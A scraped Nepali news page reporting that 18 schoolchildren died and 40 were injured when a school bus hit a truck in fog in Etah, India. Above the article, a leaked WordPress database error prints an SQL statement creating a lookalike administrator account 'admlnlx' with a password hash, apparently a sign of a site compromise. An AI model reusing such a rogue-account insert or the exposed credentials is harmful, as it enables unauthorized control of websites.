WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BuXzyRhewuD9AoeqXIzzqvl7lnjhZd/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 13:21:24', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
बस दुर्घटनामा १८ स्कुले बालबालिकाको मृत्यु, ४० घाइते – Gaule Khabar

बस दुर्घटनामा १८ स्कुले बालबालिकाको मृत्यु, ४० घाइते

बस दुर्घटनामा १८ स्कुले बालबालिकाको मृत्यु, ४० घाइते

भारत, माघ ६-

उत्तरप्रदेशको एटामा बिहीबार बिहान भएको सडक दुर्घटनामा १८ स्कुले बालबालिकाको मृत्यु भएको छ । ट्रक र स्कुलबस जुधेर भएको दुर्घटनामा ४० बालबालिका घाइते छन् ।

यो दुर्घटना एटाको अलीगञ्ज रोडमा भएको हो । एटास्थित जेएस बिद्या निकेतन स्कुलको बिद्यार्थी बोकेका बस ट्रकसँग ठोक्किएको हो ।दुर्घटना यति भयानक थियो कि बसको छत नै उडेको थियो । बाक्लो हुस्सुका कारण दुर्घटना भएको बताइन्छ ।सूचना पाउनेबित्तिकै घटनास्थलमा पुगेको प्रहरीले घाइतेलाई अस्पताल पुर्‍याएको थियो । बस बच्चालाई लिएर स्कुल जाँदै थियो । जाडो मौसममा अन्य सबै बिद्यालय बन्द भएपनि यस बिद्यालय भने खुलेको थियो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका